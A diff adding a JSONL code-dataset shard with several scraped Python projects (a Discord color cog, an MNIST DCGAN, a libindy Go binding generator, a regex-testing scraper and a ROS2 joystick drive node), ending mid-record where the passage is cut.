diff --git "a/2430.jsonl" "b/2430.jsonl" new file mode 100644--- /dev/null +++ "b/2430.jsonl" @@ -0,0 +1,355 @@ +{"seq_id":"2947718617","text":"import random\nfrom colour import Color as col\n\nfrom .customconverters import BetterMemberConverter\nfrom redbot.core import checks, commands\nfrom redbot.core.commands import Context\n\nclass VidemColor(commands.Cog):\n\tdef __init__(self, bot):\n\t\tself.color_cog = color_cog = bot.get_cog('Color')\n\n\t\tif not color_cog:\n\t\t\traise Exception('Could not load the color cog')\n\n\t@checks.bot_has_permissions(embed_links=True)\n\t@commands.command(name='randomcolor')\n\tasync def randomcolor(self, ctx: Context):\n\t\t\"\"\"Gets a random color\"\"\"\n\t\tc = col(rgb=(random.randint(0, 255) / 255, random.randint(0, 255) / 255, random.randint(0, 255) / 255))\n\t\tembed, f = await self.color_cog.build_embed(c)\n\t\tawait ctx.send(file=f, embed=embed)\n\n\t@checks.bot_has_permissions(embed_links=True)\n\t@commands.command(name='mycolor')\n\tasync def mycolor(self, ctx: Context):\n\t\t\"\"\"Gets the display color of the invoker\"\"\"\n\t\tc = col(rgb=tuple(v / 255 for v in ctx.author.color.to_rgb()))\n\t\tembed, f = await self.color_cog.build_embed(c)\n\t\tawait ctx.send(file=f, embed=embed)\n\t\n\t@checks.bot_has_permissions(embed_links=True)\n\t@commands.command(name='membercolor')\n\tasync def membercolor(self, ctx: Context, member: BetterMemberConverter):\n\t\t\"\"\"Gets the display color of the invoker\"\"\"\n\t\tc = col(rgb=tuple(v / 255 for v in member.color.to_rgb()))\n\t\tembed, f = await self.color_cog.build_embed(c)\n\t\tawait ctx.send(file=f, embed=embed)\n\t","repo_name":"therealvidem/Cogs","sub_path":"videmcolor/videmcolor.py","file_name":"videmcolor.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"3199825416","text":"from discriminator_generator import discriminator, decoder\n\nimport math\nimport numpy as np \nfrom tensorflow.contrib import layers\nfrom tensorflow.contrib import losses\nfrom tensorflow.contrib.framework import arg_scope\nimport tensorflow as tf \nfrom scipy.misc import imsave\nimport sys\nimport os\n\ndef concat_elu(inputs):\n\treturn tf.nn.elu(tf.concat([-inputs, inputs],3))\n\nclass GAN():\n\tdef __init__(self, hidden_size, batch_size, learning_rate):\n\t\tself.batch_size = batch_size\n\t\tself.hidden_size = hidden_size\n\n\t\tself.input_tensor = tf.placeholder(tf.float32, [None,28*28])\n\n\t\twith arg_scope([layers.conv2d, layers.conv2d_transpose],\n\t\t\t\t\t\tactivation_fn = concat_elu,\n\t\t\t\t\t\tnormalizer_fn = layers.batch_norm,\n\t\t\t\t\t\tnormalizer_params={'scale':True}):\n\t\t\twith tf.variable_scope(\"model\"):\n\t\t\t\tD1 = discriminator(self.input_tensor)\n\t\t\t\tD_params_num = len(tf.trainable_variables())\n\t\t\t\tG = decoder(tf.random_normal([batch_size, hidden_size]))\n\t\t\t\tself.sampled_tensor = G\n\t\t\twith tf.variable_scope('model', reuse=True):\n\t\t\t\tD2 = discriminator(G)\n\n\t\t\tself.D_loss = self.__get_discriminator_loss(D1,D2)\n\t\t\tself.G_loss = self.__get_generator_loss(D2)\n\t\t\tparams = tf.trainable_variables()\n\t\t\tD_params = params[:D_params_num]\n\t\t\tG_params = params[D_params_num:]\n\n\t\t\tglobal_step = tf.contrib.framework.get_or_create_global_step()\n\n\n\n\t\t\tself.train_discriminator = layers.optimize_loss(\n\t\t\t\tself.D_loss, global_step, learning_rate/10., 'Adam', variables=D_params, update_ops=[])\n\t\t\tself.train_generator = layers.optimize_loss(\n\t\t\t\tself.G_loss, global_step, learning_rate, 'Adam', variables=G_params, update_ops=[])\n\n\n\t\t\tself.saver = tf.train.Saver()\n\t\t\tself.sess = tf.Session()\n\t\t\tself.sess.run(tf.global_variables_initializer())\n\n\tdef __get_discriminator_loss(self, D1, D2):\n\n\t\t# return losses.sigmoid_cross_entropy(D1, tf.ones(tf.shape(D1))) + \\\n\t\t# \t\t\t\t\tlosses.sigmoid_cross_entropy(D2, tf.zeros(tf.shape(D2)))\n\t\td_loss_real = tf.nn.sigmoid_cross_entropy_with_logits(logits = D1, labels = tf.ones(tf.shape(D1)))\n\t\td_loss_fake = tf.nn.sigmoid_cross_entropy_with_logits(logits = D2, labels = tf.zeros(tf.shape(D2)))\n\t\treturn tf.reduce_mean(d_loss_fake+d_loss_real)\n\n\tdef __get_generator_loss(self, D2):\n\t\t# return losses.sigmoid_cross_entropy(D2, tf.ones(tf.shape(D2)))\n\t\treturn tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=D2, labels=tf.ones(tf.shape(D2))))\n\n\tdef update_params(self, inputs):\n\t\t# d_loss_value = self.sess.run(self.train_discriminator, {self.input_tensor: inputs})\n\n\t\t# g_loss_value = self.sess.run(self.train_generator)\n\n\t\t# return g_loss_value\n\n\t\t_,d_loss_value = self.sess.run([self.train_discriminator, self.D_loss], {\n\t\t\tself.input_tensor:inputs})\n\t\t_,g_loss_value = self.sess.run([self.train_generator, self.G_loss])\n\t\t_,g_loss_value = self.sess.run([self.train_generator, self.G_loss])\n\t\treturn g_loss_value, d_loss_value\n\n\tdef train(self, config):\n\t\tself.data_X = self.load_mnist()\n\n\t\tself.load(config.checkpoint_dir)\n\n\t\tfor ep in range(config.epoch):\n\t\t\ttotal_batch = len(self.data_X)//self.batch_size\n\t\t\ttrain_loss = 0.0\n\t\t\tfor b in range(total_batch):\n\t\t\t\tinput_x = self.data_X[b*self.batch_size: (b+1)*self.batch_size]\n\t\t\t\t# g_loss = self.update_params(input_x)\n\t\t\t\t# train_loss += g_loss\n\t\t\t\t# g_loss = train_loss/(b*self.batch_size)\n\t\t\t\t# sys.stdout.write(\"\\r {}/{} epoch {}/{} batch, g_loss:{:04f}\"\n\t\t\t\t# \t.format(ep,config.epoch, b, total_batch, g_loss))\n\t\t\t\tg_loss,d_loss = self.update_params(input_x)\n\t\t\t\tsys.stdout.write(\"\\r {}/{} epoch {}/{} batch, g_loss:{:.4f}, d_loss:{:.4f}\".format(ep,config.epoch, b, total_batch, g_loss, d_loss))\n\n\t\t\t\tsys.stdout.flush()\n\n\t\t\t\tif(ep*total_batch+b)%100==0:\n\t\t\t\t\tsamples = self.sess.run(self.sampled_tensor)\n\t\t\t\t\t# print(sampled_images.shape,\"\\n\")\n\t\t\t\t\tsamples = np.reshape(samples,[samples.shape[0],28,28,1])\n\n\t\t\t\t\tself.save_image(samples,'./{}/train_{}_{}.png'.format(config.sample_dir, ep, b))\n\t\t\t\t\tglobal_step = tf.contrib.framework.get_or_create_global_step()\n\t\t\t\t\tself.save(config.checkpoint_dir, global_step)\n\n\n\n\n\n\tdef load_mnist(self):\n\t\tf = np.load('../mnist.npz')\n\t\tx_train,y_train,x_test,y_test = f['x_train'],f['y_train'],f['x_test'],f['y_test']\n\n\t\tX = np.concatenate((x_train, x_test),axis=0)\n\t\tX = np.reshape(X,[X.shape[0],-1])\n\t\treturn X/255.\n\n\tdef save_image(self, images, path):\n\t\t# img_height, img_width, channel = images.shape[1:]\n\t\t# print (images.shape)\n\t\tmanifold_h = int(np.ceil(np.sqrt(images.shape[0])))\n\t\tmanifold_w = int(np.floor(np.sqrt(images.shape[0])))\n\t\tshape = [manifold_h, manifold_w]\n\n\t\timages = np.squeeze(images)\n\t\theight,width = images.shape[1:]\n\n\t\tret = np.zeros((shape[0]*height, shape[1]*width))\n\n\t\tfor i,img in enumerate(images):\n\t\t\th_idx = int(i/shape[0])\n\t\t\tw_idx = int(i%shape[1])\n\t\t\t# print (h_idx*height, w_idx*width)\n\t\t\tret[h_idx*height:(h_idx+1)*height, w_idx*width:(w_idx+1)*width] = img\n\n\t\timsave(path, ret)\n\n\tdef save(self, checkpoint_dir, step):\n\t\tmodel_name = \"DCGAN.model\"\n\t\t# checkpoint_dir = os.path.join(checkpoint_dir, self.model_dir)\n\n\n\t\tself.saver.save(self.sess,\n\t\t\t\t\t\tos.path.join(checkpoint_dir, model_name),\n\t\t\t\t\t\tglobal_step=step)\n\n\tdef load(self, checkpoint_dir):\n\t\timport re\n\t\tprint(\" [*] Reading checkpoints...\")\n\t\t# checkpoint_dir = os.path.join(checkpoint_dir, self.model_dir)\n\n\t\tckpt = tf.train.get_checkpoint_state(checkpoint_dir)\n\t\tif ckpt and ckpt.model_checkpoint_path:\n\t\t\tckpt_name = os.path.basename(ckpt.model_checkpoint_path)\n\t\t\tself.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name))\n\t\t\tcounter = int(next(re.finditer(\"(\\d+)(?!.*\\d)\",ckpt_name)).group(0))\n\t\t\tprint(\" [*] Success to read {}\".format(ckpt_name))\n\t\t\treturn True, counter\n\t\telse:\n\t\t\tprint(\" [*] Failed to find a checkpoint\")\n\t\t\treturn False, 0\n","repo_name":"uqjwen/dcgan-tensorflow-mnist-easy","sub_path":"dcgan.py","file_name":"dcgan.py","file_ext":"py","file_size_in_byte":5679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"44942459932","text":"import os\n\nfrom indy_gen.function import FunctionParameter, IndyFunction\n\nfrom .utils import to_camel_case, go_param_string, types_string, c_param_string, names_string\n\n\n_REGISTER_CALL = '''\n\tpointer, commandHandle, resCh, err := resolver.RegisterCall(\"{function_name}\")\n\tif err != nil {{\n\t res_err = fmt.Errorf(\"Failed to register call for {function_name}. Error: %s\", err)\n\t return {result_var_names}\n\t}}\n'''\n_CALLBACK_ERRCHECK = '''\n if deregisterErr != nil {\n panic(\"Invalid handle in callback!\")\n }\n'''\n_C_CALL_CHECK = '''\n if code != 0 {{\n res_err = fmt.Errorf(\"Libindy returned code: %d\", code)\n return {result_var_names}\n }}\n'''\n_RESULT_RETRIEVING = '''\n _res := <- resCh\n res := _res.({expected_type})\n'''\n_RESULT_RETRIEVING_CHECK_SINGLE = '''\n if res != 0 {\n res_err = fmt.Errorf(\"Libindy returned code: %d\", res)\n'''\n_RESULT_RETRIEVING_CHECK_MULTIPLE = '''\n if res.{code_field_name} != 0 {{\n res_err = fmt.Errorf(\"Libindy returned code: %d\", res.{code_field_name})\n'''\n\nclass GoTranslator:\n GO_TO_CGO_TYPES = {\n 'string': '*C.char',\n 'int32': 'C.int32_t',\n 'uint32': 'C.uint32_t',\n 'int': 'C.int64_t',\n 'uint64': 'C.uint64_t',\n '*uint8': '*C.char',\n 'bool': 'C.bool',\n }\n\n C_TO_CGO_TYPES = {\n 'unsigned long long': 'C.ulonglong',\n 'int32_t': 'C.int32_t',\n 'uint32_t': 'C.uint32_t',\n 'unsigned int': 'C.uint',\n 'long': 'C.long',\n 'uint8_t*': 'C.uint8_t',\n 'bool': 'C.bool',\n }\n\n CGO_TO_GO_TYPES = {\n '*C.char': 'string',\n 'C.int32_t': 'int32',\n 'C.uint32_t': 'uint32',\n 'C.int64_t': 'int64',\n 'C.uint64_t': 'uint64',\n '*C.uint8_t': 'string',\n 'C.bool': 'bool',\n }\n\n\n def __init__(self, output_path):\n self._output_path = output_path\n\n def translate_single(self, name, c_func):\n go_function = GoFunction.from_indy_function(c_func)\n result_strings = self._generate_result_strings(go_function)\n callback_name, callback_code = self._generate_callback(go_function, result_strings[1], result_strings[2])\n c_proxy_name, c_proxy_declaration, c_proxy_extern, c_proxy_code = self._generate_c_proxy(c_func, callback_name)\n core_code = self._generate_core(go_function, c_func.name, c_proxy_name, result_strings[3])\n print(core_code)\n\n def translate(self, name, functions):\n callbacks = []\n c_proxy_declarations = []\n c_proxy_extern_declarations = []\n c_proxies = []\n result_struct_definitions = []\n cores = []\n\n for func_name, c_func in functions.items():\n go_function = GoFunction.from_indy_function(c_func)\n result_strings = self._generate_result_strings(go_function)\n callback_name, callback_code = self._generate_callback(go_function, result_strings[1], result_strings[2])\n c_proxy_name, c_proxy_declaration, c_proxy_extern, c_proxy_code = self._generate_c_proxy(c_func, callback_name)\n core_code = self._generate_core(go_function, c_func.name, c_proxy_name, result_strings[3])\n\n callbacks.append(callback_code)\n c_proxy_declarations.append(c_proxy_declaration)\n c_proxy_extern_declarations.append(c_proxy_extern)\n c_proxies.append(c_proxy_code)\n cores.append(core_code)\n result_struct_definitions.append(result_strings[0])\n\n if cores:\n self._populate_c_file(name, c_proxy_extern_declarations, c_proxies)\n self._populate_go_file(name, c_proxy_declarations, callbacks, result_struct_definitions, cores)\n\n def _populate_c_file(self, domain, extern_declarations, proxies):\n full_path = os.path.join(self._output_path, domain + '.c')\n\n with open(full_path, 'w') as f:\n f.write('#include \\n')\n f.write('#include \\n\\n')\n f.write('\\n'.join(extern_declarations))\n f.write('\\n\\n\\n')\n f.write('\\n\\n\\n'.join(proxies))\n f.write('\\n')\n\n def _populate_go_file(self, domain, c_proxy_declarations, callbacks, result_struct_defintions, core_functions):\n full_path = os.path.join(self._output_path, domain + '.go')\n\n with open(full_path, 'w') as f:\n f.write('package indy\\n\\n')\n f.write('/*\\n')\n f.write('#include \\n')\n f.write('#include \\n')\n f.write('#include \\n')\n f.write('\\n'.join(c_proxy_declarations))\n f.write('\\n')\n f.write('*/\\n')\n f.write('import \"C\"\\n\\n')\n f.write('import (\\n\\t\"fmt\"\\n\\t\"unsafe\"\\n)\\n\\n')\n f.write('\\n\\n'.join(core_functions))\n f.write('\\n\\n')\n f.write('\\n\\n'.join(result_struct_defintions))\n f.write('\\n\\n')\n f.write('\\n\\n'.join(callbacks))\n f.write('\\n\\n')\n\n def _generate_callback(self, go_function, result_initialisation, result_sending):\n callback_name = go_function.name[0].lower() + go_function.name[1:] + 'Callback'\n callback_export = '//export ' + callback_name\n callback_param_strings= []\n callback_param_types = []\n callback_param_names = []\n for param in go_function.callback.parameters:\n param_type_cgo = self.GO_TO_CGO_TYPES[param.type]\n callback_param_strings.append(f'{param.name} {param_type_cgo}')\n callback_param_names.append(param.name)\n callback_param_types.append(param_type_cgo)\n callback_params = ', '.join(callback_param_strings)\n go_var_names, go_var_declarations, go_var_setups = self._setup_go_variables(callback_param_names[1:], callback_param_types[1:])\n var_declaration_code = '\\n\\t'.join(go_var_declarations)\n err_setup_code = go_var_setups[0]\n setup_code = '\\n\\n\\t'.join(go_var_setups[1:])\n signature = f'func {callback_name}({callback_params})'\n first_param_name = go_function.callback.parameters[0].name\n result_initialisation_lines = result_initialisation.split('\\n')\n result_initialisation_error = '\\n\\t'.join(result_initialisation_lines)\n error_check = f'if go_err != 0 {{\\n\\t\\t{result_initialisation_error}\\n\\t{result_sending}\\n\\t\\treturn\\n\\t}}'\n deregister = f'resCh, deregisterErr := resolver.DeregisterCall(int32({first_param_name}))'\n callback_code = (f'{callback_export}\\n{signature}{{\\n\\t{var_declaration_code}\\n\\n\\t{deregister}{_CALLBACK_ERRCHECK}\\n'\n f'\\t{err_setup_code}\\n\\t{error_check}\\n\\n\\t{setup_code}\\n\\t{result_initialisation}{result_sending}\\n}}')\n return callback_name, callback_code\n\n def _generate_result_strings(self, go_function):\n if len(go_function.callback.parameters) > 2:\n return self._generate_result_strings_for_complex_result(go_function)\n else:\n callback_res_name = go_function.callback.parameters[1].name\n callback_res_type = go_function.callback.parameters[1].type\n sending = f'resCh <- go_{callback_res_name}'\n receiving = _RESULT_RETRIEVING.format(expected_type=callback_res_type)\n receiving = f'{receiving}\\t{_RESULT_RETRIEVING_CHECK_SINGLE}'\n return '', '', sending, receiving\n\n def _generate_result_strings_for_complex_result(self, go_function):\n function_name_lower = go_function.name[0].lower() + go_function.name[1:]\n result_struct_name = f'{function_name_lower}Result'\n result_fields = go_function.callback.parameters[1:]\n struct_field_declarations = []\n for field in result_fields:\n if field.type == '*uint8':\n field_type = 'string'\n else:\n field_type = field.type\n struct_field_declarations.append(f'{field.name} {field_type}')\n field_declaration_string = '\\n\\t'.join(struct_field_declarations)\n struct_declaration = f'type {result_struct_name} struct {{\\n\\t{field_declaration_string}\\n}}'\n\n struct_field_initialisations = []\n for field in result_fields:\n struct_field_initialisations.append(f'{field.name}: go_{field.name}')\n field_initialisation_string = ',\\n\\t\\t'.join(struct_field_initialisations)\n struct_initialisation = f'res := &{result_struct_name} {{\\n\\t\\t{field_initialisation_string},\\n\\t}}\\n'\n receiving = _RESULT_RETRIEVING.format(expected_type='*' + result_struct_name)\n struct_err_field_name = go_function.callback.parameters[1].name\n receiving += f'\\t{_RESULT_RETRIEVING_CHECK_MULTIPLE}'.format(code_field_name=struct_err_field_name)\n\n return struct_declaration, struct_initialisation, '\\tresCh <- res', receiving\n\n def _generate_c_proxy(self, indy_function, go_callback_name):\n extern_declaration_types = types_string(indy_function.callback.parameters)\n extern_declaration = f'extern void {go_callback_name}({extern_declaration_types});'\n c_proxy_name = indy_function.name + '_proxy'\n fp_param = FunctionParameter('fp', 'void *')\n all_params = [fp_param] + indy_function.parameters\n c_proxy_declaration = f'{indy_function.return_type} {c_proxy_name}({types_string(all_params)});'\n c_proxy_types_declaration = c_param_string(all_params)\n c_proxy_signature = f'{indy_function.return_type} {c_proxy_name}({c_proxy_types_declaration})'\n indy_function_types = types_string(all_params[1:])\n function_cast = f'{indy_function.return_type} (*func)({indy_function_types}, void *) = fp;'\n function_arguments = names_string(all_params[1:])\n function_invocation = f'return func({function_arguments}, &{go_callback_name});'\n c_proxy_code = f'{c_proxy_signature} {{\\n\\t{function_cast}\\n\\t{function_invocation}\\n}}'\n return c_proxy_name, c_proxy_declaration, extern_declaration, c_proxy_code\n\n def _generate_core(self, go_indy_function, indy_function_name, c_proxy_name, result_retrieval):\n return_parameters = go_indy_function.callback.parameters[1:]\n first_return_param = return_parameters[0]\n return_parameters.pop(0)\n return_parameters.append(first_return_param)\n\n return_types = [param.type for param in return_parameters]\n return_types[-1] = 'error'\n return_var_names = ['res_' + param.name for param in return_parameters]\n return_var_names_string = ', '.join(return_var_names)\n return_vars_init = []\n for name, type in zip(return_var_names, return_types):\n return_vars_init.append(f'var {name} {type}')\n return_vars_init_string = '\\n\\t'.join(return_vars_init)\n\n return_types_string = ', '.join(return_types)\n\n params = go_param_string(go_indy_function.parameters[1:])\n\n signature = f'func {go_indy_function.name}({params}) ({return_types_string})'\n\n register_call = _REGISTER_CALL.format(function_name=indy_function_name,\n result_var_names=return_var_names_string)\n # handle = FunctionParameter('commandHandle', 'int32')\n # variables = [handle] + go_indy_function.parameters\n variables = go_indy_function.parameters\n\n variable_names, variable_passing, variable_setups = self._setup_variables(variables)\n variable_setup_string = '\\n\\n\\t'.join(variable_setups)\n variable_names.insert(0, 'pointer')\n variable_passing.insert(0, 'pointer')\n variable_names = ', '.join(variable_passing)\n\n c_call = f'code := C.{c_proxy_name}({variable_names})'\n c_call_check = _C_CALL_CHECK.format(result_var_names=return_var_names_string)\n\n result_var_assignments = [f'{var_name} = res.{var_name.replace(\"res_\", \"\")}' for var_name in return_var_names\n if var_name != 'res_err']\n result_var_assignment_string = '\\n\\t' + '\\n\\t'.join(result_var_assignments)\n retrieval_and_check = result_retrieval + f'\\t\\treturn {return_var_names_string}\\n\\t}}\\n'\n\n return (f'{signature} {{\\n\\t{return_vars_init_string}\\n\\t{register_call}'\n f'\\n\\n\\t{variable_setup_string}\\n\\n\\t{c_call}\\t{c_call_check}'\n f'\\t{retrieval_and_check}'\n f'\\t{result_var_assignment_string}\\n\\n\\treturn {return_var_names_string}\\n}}')\n\n def _setup_variables(self, variables):\n variable_names = []\n variable_passings = []\n variable_setups = []\n\n for var in variables:\n if isinstance(var, GoFunction):\n name, passing, setup = self._setup_func_var(var)\n else:\n name, passing, setup = self._setup_var(var)\n variable_names.append(name)\n variable_passings.append(passing)\n variable_setups.append(setup)\n\n return variable_names, variable_passings, variable_setups\n\n def _setup_go_variables(self, names, types):\n go_variable_names = []\n go_variable_declarations = []\n go_variable_setups = []\n\n for callback_param_name, callback_param_type in zip(names, types):\n name, declaration, setup = self._setup_go_var(callback_param_name, callback_param_type)\n go_variable_names.append(name)\n go_variable_declarations.append(declaration)\n go_variable_setups.append(setup)\n\n return go_variable_names, go_variable_declarations, go_variable_setups\n\n def _setup_go_var(self, var_name, var_type):\n go_var_name = 'go_' + var_name\n go_var_type = self.CGO_TO_GO_TYPES[var_type]\n go_var_declaration = f'var {go_var_name} {go_var_type}'\n if var_type == '*C.char':\n setup = f'if {var_name} != nil {{\\n\\t\\t{go_var_name} = C.GoString({var_name})\\n\\t}}\\t\\t'\n # f'defer C.free(unsafe.Pointer({var_name}))\\n\\t}}')\n elif var_type == 'C.int32_t':\n setup = f'{go_var_name} = {go_var_type}({var_name})'\n elif var_type == '*C.uint8_t':\n setup = f'if {var_name} != nil {{\\n\\t\\t{go_var_name} = C.GoString({var_name})\\n\\t}}\\t\\t'\n # f'defer C.free(unsafe.Pointer({var_name}))\\n\\t}}'\n elif var_type == 'C.uint32_t':\n setup = f'{go_var_name} = {go_var_type}({var_name})'\n elif var_type == 'C.int64_t':\n setup = f'{go_var_name} = {go_var_type}({var_name})'\n elif var_type == 'C.uint64_t':\n setup = f'{go_var_name} = {go_var_type}({var_name})'\n elif var_type == 'C.bool':\n setup = f'{go_var_name} = {go_var_type}({var_name})'\n else:\n raise Exception(f'Unsupported var_type: {var_type}')\n return go_var_name, go_var_declaration, setup\n\n def _setup_func_var(self, var):\n c_var_name = 'c_' + var.name\n var_declaration = f'var {c_var_name} unsafe.Pointer'\n setup = f'{var_declaration}\\n\\t{c_var_name} = unsafe.Pointer(&{var.name})'\n return c_var_name, c_var_name, setup\n\n def _setup_var(self, var):\n c_var_name = 'c_' + var.name\n passing = c_var_name\n c_var_type = self.GO_TO_CGO_TYPES[var.type]\n if var.type == 'string':\n var_declaration = f'var {c_var_name} {c_var_type}'\n setup = (f'if {var.name} != \"\" {{\\n\\t\\t{c_var_name} = C.CString({var.name})\\n\\t\\t'\n f'defer C.free(unsafe.Pointer({c_var_name}))\\n\\t}}')\n setup = f'{var_declaration}\\n\\t{setup}'\n elif var.type == 'int32':\n setup = f'{c_var_name} := {self.C_TO_CGO_TYPES[var.original_type]}({var.name})'\n elif var.type == 'uint32':\n setup = f'{c_var_name} := {self.C_TO_CGO_TYPES[var.original_type]}({var.name})'\n elif var.type == 'int':\n setup = f'{c_var_name} := {self.C_TO_CGO_TYPES[var.original_type]}({var.name})'\n elif var.type == 'uint64':\n setup = f'{c_var_name} := {self.C_TO_CGO_TYPES[var.original_type]}({var.name})'\n elif var.type == '*uint8':\n setup = f'{c_var_name} := {self.C_TO_CGO_TYPES[var.original_type]}(*{var.name})'\n passing = '&' + passing\n elif var.type == 'bool':\n setup = f'{c_var_name} := {self.C_TO_CGO_TYPES[var.original_type]}({var.name})'\n else:\n raise Exception(f'No setup for var type: {var.type}')\n\n return c_var_name, passing, setup\n\n\n\nclass GoFunction:\n TYPE_MAP = {\n 'int32_t': 'int32',\n 'const char*': 'string',\n 'const char *': 'string',\n 'const char * const': 'string',\n 'const char *const': 'string',\n 'char*': 'string',\n 'void': '',\n 'uint8_t*': 'string',\n 'uint32_t': 'uint32',\n 'unsigned int': 'uint32',\n 'int32_t*': '*int32',\n 'char**': '*string',\n 'long': 'int',\n 'unsigned long long': 'uint64',\n 'bool': 'bool',\n }\n\n API_TYPE_MAP = {\n '*C.char': 'string',\n }\n\n\n @classmethod\n def from_indy_function(cls, indy_function):\n try:\n camel_case_name = to_camel_case(indy_function.name.replace('indy_', ''))\n go_func_name = camel_case_name[0].title() + camel_case_name[1:]\n\n go_func_params = []\n for param in indy_function.parameters:\n if isinstance(param, IndyFunction):\n go_func_params.append(cls.from_indy_function(param))\n else:\n qualified_type = param.qualified_type()\n go_param_type = cls.TYPE_MAP.get(qualified_type, cls.TYPE_MAP[param.type])\n go_param_name = to_camel_case(param.name)\n go_param = FunctionParameter(go_param_name, go_param_type, original_type=param.type)\n go_func_params.append(go_param)\n\n go_return_type = cls.TYPE_MAP[indy_function.return_type]\n\n if indy_function.callback:\n go_func_callback = cls.from_indy_function(indy_function.callback)\n else:\n go_func_callback = None\n\n return cls(go_func_name, go_return_type, go_func_params, go_func_callback)\n except Exception as e:\n raise Exception(f'Failed to create go function {indy_function.name}. Exception {e}') from e\n\n def __init__(self, name, return_type, parameters, callback):\n name = name.replace('*', '')\n if name == 'type':\n name = 'type_'\n self.name = name\n self.return_type = return_type\n self.parameters = parameters\n self.callback = callback\n\n def __str__(self):\n param_string = '\\n\\t'.join(str(param) for param in self.parameters)\n return (f'[GoFunction]\\nName: {self.name}\\nReturn type: {self.return_type}\\n' +\n f'Parameters:\\n\\t{param_string}\\n' +\n f'Callback: {str(self.callback)}\\n')\n\n def __repr__(self):\n return str(self)\n\n @property\n def type(self):\n return f'func({types_string(self.parameters)})({self.return_type})'","repo_name":"keichiri/indy-gen","sub_path":"indy_gen/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":19054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"23109989359","text":"import urllib.request\nimport re\nfrom selenium import webdriver\n\ndef do_static_web(url):\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36\"}\n req = urllib.request.Request(url, headers=headers)\n resp = urllib.request.urlopen(req)\n return resp.read().decode(\"utf-8\")\n\n\ndef do_real_browser(browser, url):\n #browser = webdriver.Chrome(\"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chromedriver.exe\")\n browser.get(url)\n return browser.page_source\n\n\ndef test(html, your_regex):\n #print(html)\n pattern = re.compile(your_regex, re.S)\n content_list = pattern.findall(html)\n print(content_list)\n\nif __name__ == \"__main__\":\n #your_regex = input(\"输入要测试的正则:\")\n #url = input(\"输入要测试的url:\")\n your_regex = '()'\n url = \"https://tieba.baidu.com/p/5629389674\"\n command = input(\"直接打开输入1,浏览器打开输入2:\")\n if command == \"1\":\n test(do_static_web(url), your_regex)\n elif command == \"2\":\n browser = webdriver.Chrome(\"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chromedriver.exe\")\n test(do_real_browser(browser,url), your_regex)\n browser.close()\n else:\n print(\"fuck off!\")\n","repo_name":"HHIngo/BrowserSpider","sub_path":"spider/checkRegex.py","file_name":"checkRegex.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"20"} +{"seq_id":"17738976826","text":"import rclpy\n\nfrom rclpy.node import Node\n\nfrom sensor_msgs.msg import Joy\n\nfrom std_msgs.msg import String\n\nfrom geometry_msgs.msg import Twist\n\nfrom rclpy import qos\n\nimport math\n\nclass Ps4(Node):\n\tdef __init__(self):\n\t\tsuper().__init__(\"xbox_control_node\")\n\t\tself.dat = self.create_subscription(Joy, \"joy\", self.sub_callback, qos_profile=qos.qos_profile_sensor_data)\n\t\tself.dat\n\n\t\tself.sent_drive = self.create_publisher(Twist, \"control_drive_topic\", qos_profile=qos.qos_profile_system_default)\n\t\tself.sent_drive_timer = self.create_timer(0.05, self.sent_drive_callback)\n\n\t\tself.button = {}\n\t\tself.all = [\"S\",\"X\",\"O\",\"T\",\"L1\",\"R1\",\"L2\",\"R2\",\"Share\",\"Option\",\"AL\",\"AR\",\"PS\",\"Home\"]\n\t\tfor index, element in enumerate(self.all):\n\t\t\tself.button[element] = 0\n\n\t\tself.axes = {}\n\t\tself.all2 = [\"LX\", \"LY\", \"RX\", \"LT\", \"RT\", \"RY\"]\n\t\tfor index, element in enumerate(self.all2):\n\t\t\tself.axes[element] = 0\n\n\n\tdef sub_callback(self, msg_in):\t#subscription topic\n\t\tfor index, element in enumerate(self.all):\n\t\t\tself.button[element] = msg_in.buttons[index]\n#\t\t\tprint(f\"{self.all[index]} : {self.button[element]}\")\n\n\t\tfor index, element in enumerate(self.all2):\n\t\t\tif msg_in.axes[index] <= 0.2 and msg_in.axes[index] >= -0.2:\n\t\t\t\tself.axes[element] = 0\n\t\t\telse:\n\t\t\t\tself.axes[element] = msg_in.axes[index]\n#\t\t\tprint(f\"{self.all2[index]} : {self.axes[element]}\")\n\n\tdef sent_drive_callback(self): #publisher drive topic\n\t\tlimit = 0.1\n\n\t\tmsg = Twist()\n\n\t\tx = -1*self.axes[\"LX\"]\n\t\ty = self.axes[\"LY\"]\n\n\t\tif (int(self.button[\"L1\"]) == 0):\n\t\t\tif x < limit and x > -1*limit and y < limit and y >-1*limit:\n\t\t\t\tx = 0\n\t\t\t\ty = 0\n\t\t\telif x < limit and x > -1*limit:\n\t\t\t\tx = 0\n\t\t\telif y < limit and y > -1*limit:\n\t\t\t\ty = 0\n\t\t\telif x >= 0 and y >= 0:\n\t\t\t\tx = 0.707\n\t\t\t\ty = 0.707\n\t\t\telif x <= 0 and y >= 0:\n\t\t\t\tx = -0.707\n\t\t\t\ty = 0.707\n\t\t\telif x <= 0 and y <= 0:\n\t\t\t\tx = -0.707\n\t\t\t\ty = -0.707\n\t\t\telif x >= 0 and y <= 0:\n\t\t\t\tx = 0.707\n\t\t\t\ty = -0.707\n\t\t\t\t\n\n\t\tturn = -1*self.axes[\"RX\"]\n\t\ttheta = math.atan2(y, x)\n\t\tpower = math.hypot(x, y)\n\t\tsin = math.sin(theta - math.pi/4)\n\t\tcos = math.cos(theta - math.pi/4)\n\t\tMax = max(abs(sin), abs(cos))\n\t\tleftFront = power * cos/Max + turn\n\t\trightFront = power * sin/Max - turn\n\t\tleftBack = power * sin/Max + turn\n\t\trightBack = power * cos/Max - turn\n\n\t\tif ((power + abs(turn)) > 1):\n\t\t\tleftFront /= (power + abs(turn))\n\t\t\trightFront /= (power + abs(turn))\n\t\t\tleftBack /= (power + abs(turn))\n\t\t\trightBack /= (power + 